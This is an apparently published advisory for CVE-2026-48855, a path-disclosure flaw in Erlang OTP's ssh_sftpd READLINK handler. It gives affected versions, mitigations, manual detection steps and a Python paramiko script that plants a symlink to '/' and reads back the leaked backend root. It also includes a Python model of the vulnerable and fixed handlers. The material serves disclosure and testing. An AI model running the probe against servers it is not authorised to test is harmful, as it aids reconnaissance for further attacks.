CVE-2026-48855
Information Disclosure in Erlang OTP SSH SFTP

Publication date: 2026-06-10

Last updated on: 2026-06-10

Assigner: EEF

Description
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Erlang OTP ssh (ssh_sftpd module) allows File Discovery.

The SSH_FXP_READLINK handler in ssh_sftpd sends the raw result of file:read_link/2 to the client without calling chroot_filename/2 to strip the backend root prefix. An authenticated SFTP client can create a symlink inside the chroot whose target is / (the root as the client names it); when handling that SSH_FXP_SYMLINK request, ssh_sftpd resolves the target against the absolute backend root and stores the resolved path on disk. Reading the symlink back via SSH_FXP_READLINK therefore returns the absolute backend path, for example /data/sftp, instead of the chrooted value /.

The information disclosed is the absolute filesystem path of the SFTP root directory and of any symlink targets within it. No file contents, credentials, or access to paths outside the root directory are obtainable through this issue alone.

Affected source file: lib/ssh/src/ssh_sftpd.erl.

Affected versions: OTP 17.0 and later, fixed in OTP 29.0.2, 28.5.0.2 and 27.3.4.13; in terms of the ssh application, 3.0.1 and later, fixed in ssh 6.0.1, 5.5.2.1 and 5.2.11.8.
Affected Vendors & Products

Vendor   Product   Version / Range
erlang   otp       17.0 (inclusive) up to, but not including, 29.0.2; also fixed in 28.5.0.2 (OTP 28) and 27.3.4.13 (OTP 27)
erlang   ssh       3.0.1 (inclusive) up to, but not including, 6.0.1; also fixed in 5.5.2.1 and 5.2.11.8

The fixed releases are excluded from the affected ranges, as the description states ("before 29.0.2", "before 6.0.1").
CWE

CWE-200: Exposure of Sensitive Information to an Unauthorized Actor. The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.
Executive Summary

This vulnerability exists in the Erlang OTP ssh_sftpd module, specifically in the SSH_FXP_READLINK handler. When an authenticated SFTP client creates a symbolic link inside its chrooted directory whose target is / (the chroot root as the client names it), the server stores the target resolved against the absolute backend path of that root rather than the chrooted path. SSH_FXP_READLINK then returns the stored value unchanged, so the client learns the absolute filesystem path of the SFTP root directory, and likewise the absolute targets of any other symlinks within it.

Importantly, this issue only leaks path information: it does not expose file contents or credentials, and it does not grant access to paths outside the root directory.

Impact Analysis

The impact of this vulnerability is limited to the exposure of absolute filesystem paths: that of the SFTP root directory and those of symlink targets within it, including symlinks that already existed in the root before the client connected. This can reveal details of the host directory layout, mount points, or usernames if the root directory sits under a user's home directory.

While no file contents or credentials are exposed, and no direct access outside the root directory is granted, the leaked paths could assist an attacker in planning further attacks if combined with other vulnerabilities, for example by supplying the exact absolute path that a separate file-write or path-traversal bug would need.

The vulnerability has a low severity score (CVSS 2.3) because of its limited impact on confidentiality, integrity, and availability.

Detection Guidance

This vulnerability can be detected by exercising the SSH_FXP_READLINK handler of the Erlang OTP ssh_sftpd module against a symbolic link created inside the chrooted SFTP root directory.

An authenticated SFTP client creates a symlink inside the chroot whose target is /, then reads it back with SSH_FXP_READLINK. If the server returns the absolute backend filesystem path (e.g., /data/sftp) instead of the chrooted path (/), the vulnerability is present. The account used must be allowed to create files in its SFTP root, since the probe writes a link there.

Using the OpenSSH sftp client, the probe is:

  • Connect to the SFTP server with valid credentials.
  • Create a symbolic link inside the chrooted SFTP root directory pointing to /: ln -s / symlink_name (the client sends SSH_FXP_SYMLINK for this)
  • Read the link target back: readlink symlink_name
  • Remove the probe link afterwards: rm symlink_name

A fixed server answers /. If the returned path is an absolute backend path such as /data/sftp, the vulnerability exists.
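
The same probe, scripted, as an added example that is not code from the Erlang/OTP project or from this advisory. The offline helper infer_backend_root() interprets a READLINK answer and recovers the leaked root; it also generalises beyond the / probe to any absolute target (e.g. a link to /incoming that comes back as /data/sftp/incoming). probe() performs the live check and needs the third-party paramiko library and network access; the host, port, credentials and the probe link name are assumptions.

```python
"""Probe an SFTP server for the SSH_FXP_READLINK root-prefix leak.

Added example; not code from the Erlang/OTP project or from this advisory.
infer_backend_root() interprets READLINK answers offline. probe() performs
the live check and needs the third-party paramiko library plus network access;
host, port, credentials and the probe link name are assumptions.
"""
import posixpath
from typing import Optional


def infer_backend_root(requested_target: str, returned_target: str) -> Optional[str]:
    """Compare the absolute target given to SYMLINK with what READLINK returned.

    A fixed server echoes the chrooted value ('/' -> '/'). A vulnerable server
    returns the target resolved against the backend root, so the extra leading
    part is the leaked absolute root. Returns that root, or None if nothing leaked.
    """
    if not requested_target.startswith("/"):
        raise ValueError("use an absolute target; only those are resolved into the root")
    req = posixpath.normpath(requested_target)
    ret = posixpath.normpath(returned_target)
    if ret == req:
        return None                 # prefix was stripped: not vulnerable
    if req == "/":
        return ret                  # the whole answer is the backend root
    # e.g. '/data/sftp/incoming' for request '/incoming' -> '/data/sftp';
    # req starts with '/', so endswith() already matches on a component boundary
    if len(ret) > len(req) and ret.endswith(req):
        return ret[: -len(req)]
    return None                     # unexpected shape: no evidence either way


def probe(host: str, username: str, password: str, port: int = 22,
          link_name: str = "cve-2026-48855-probe") -> Optional[str]:
    """Create a symlink to '/' in the SFTP root, read it back, remove it.

    Needs write permission in the root. Returns the leaked backend root, or
    None when the server answers '/'. paramiko is imported lazily so the
    offline helper above has no third-party dependency.
    """
    import paramiko  # assumed installed; only needed for the live probe

    transport = paramiko.Transport((host, port))
    try:
        # hostkey is not checked here; pass the expected key to connect() in real use
        transport.connect(username=username, password=password)
        sftp = paramiko.SFTPClient.from_transport(transport)
        try:
            sftp.symlink("/", link_name)        # SSH_FXP_SYMLINK
            target = sftp.readlink(link_name)   # SSH_FXP_READLINK
        finally:
            try:
                sftp.remove(link_name)          # never leave the probe behind
            except IOError:
                pass
            sftp.close()
    finally:
        transport.close()
    if target is None:
        raise RuntimeError("server returned no target for the probe link")
    return infer_backend_root("/", target)


if __name__ == "__main__":
    # Constructed READLINK answers, as a vulnerable and a fixed server would return them.
    print(infer_backend_root("/", "/data/sftp"))   # /data/sftp (vulnerable)
    print(infer_backend_root("/", "/"))            # None (fixed)
```

Run probe("sftp.example.internal", "tester", "secret") against a test account; a return value of None means the server strips the root prefix, anything else is the disclosed backend root. The probe is harmless apart from briefly creating one symlink, but run it only against systems you are authorised to test.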

Mitigation Strategies

Immediate mitigation steps for this vulnerability include:

  • Apply the official fix from the Erlang/OTP project, which makes ssh_sftpd canonicalize the READLINK result and strip the backend root prefix (chroot_filename/2) before sending the target to the client.
  • Upgrade Erlang/OTP to 29.0.2, 28.5.0.2 or 27.3.4.13 or later (ssh application 6.0.1, 5.5.2.1 or 5.2.11.8 or later).
  • Run the SFTP server inside an OS-level chroot or equivalent filesystem namespace. This does not remove the leak, but the absolute path the Erlang VM sees, and therefore discloses, is then a path inside the jail rather than the host's real directory layout.
  • Restrict SFTP access to trusted networks and users; the issue requires an authenticated client that can create symlinks in its root.
  • Avoid placing the SFTP root under a directory whose path is itself sensitive (usernames, customer identifiers, mount names), and do not create symlinks inside the root whose absolute targets you would not want disclosed.
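
What the first mitigation has to do, shown as an added Python model rather than the Erlang/OTP ssh_sftpd code: the vulnerable READLINK returns the stored target as-is, the hardened one passes it through a chroot_filename step first. The model's assumptions are an in-memory link store, a backend root of /data/sftp, and the way SYMLINK resolves a client-supplied absolute target against that root (the advisory says it does; the exact rules are this example's own).

```python
"""Vulnerable and hardened READLINK handling, modelled in Python.

Added illustration, not the Erlang/OTP ssh_sftpd code. It mirrors the path
handling the advisory describes: SYMLINK resolves the client's absolute target
against the backend root before storing it; READLINK must strip that root again
(the chroot_filename/2 step the vulnerable code skipped). The in-memory link
store, the backend root '/data/sftp' and the resolution rules are assumptions
constructed for the example.
"""
import posixpath

BACKEND_ROOT = "/data/sftp"     # assumed server-side root of the chroot


def resolve_into_root(root, client_path):
    """Map a client-visible absolute path onto the backend filesystem."""
    rel = posixpath.normpath("/" + client_path.lstrip("/")).lstrip("/")  # '..' collapses at '/'
    return posixpath.normpath(posixpath.join(root, rel))                  # '/' -> '/data/sftp'


def chroot_filename(root, backend_path):
    """Strip the backend root so the client only ever sees chroot-relative paths.

    Matches on a path-component boundary, so root '/data/sftp' does not mangle
    '/data/sftp2/x'. A stored target outside the root is never echoed back;
    this model raises instead (a design choice for the example).
    """
    root = posixpath.normpath(root)
    backend_path = posixpath.normpath(backend_path)
    if root == "/":
        return backend_path
    if backend_path == root:
        return "/"
    if backend_path.startswith(root + "/"):
        return backend_path[len(root):]
    raise ValueError("target %r lies outside root %r" % (backend_path, root))


class SftpdModel:
    """Minimal stand-in for ssh_sftpd's SYMLINK/READLINK handlers."""

    def __init__(self, root=BACKEND_ROOT):
        self.root = root
        self.links = {}     # backend path of the link -> stored target (file:read_link/2 result)

    def symlink(self, target, link_path):
        # SSH_FXP_SYMLINK: both names are chrooted before the link is written
        self.links[resolve_into_root(self.root, link_path)] = resolve_into_root(self.root, target)

    def readlink_vulnerable(self, link_path):
        # The bug: the raw stored target is sent back as-is
        return self.links[resolve_into_root(self.root, link_path)]

    def readlink_fixed(self, link_path):
        # The fix: strip the backend root prefix before answering
        return chroot_filename(self.root, self.readlink_vulnerable(link_path))


if __name__ == "__main__":
    server = SftpdModel()
    server.symlink("/", "probe")                 # what 'ln -s / probe' sends
    print(server.readlink_vulnerable("probe"))   # /data/sftp  (leaks the backend root)
    print(server.readlink_fixed("probe"))        # /           (chrooted value)
```

The boundary check in chroot_filename is the part worth copying: a naive prefix strip would turn a stored target of /data/sftp2/x under root /data/sftp into 2/x, which is both wrong and still a leak.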

Compliance Impact

The vulnerability exposes the absolute filesystem path of the SFTP root directory, and of symlink targets within it, to an authenticated client. No file contents or credentials are disclosed and no access outside the root is gained, but the paths can reveal host directory structure, mount points, or usernames if the root sits under a directory such as /home.

Such exposure of system structure may bear on compliance with regimes like GDPR or HIPAA, which require protection of sensitive information and minimization of data exposure, chiefly where directory names themselves contain personally identifiable information or sensitive organizational data.

Applying the patch, using an OS-level chroot, restricting SFTP access, and keeping sensitive information out of directory paths under the SFTP root reduce this exposure.
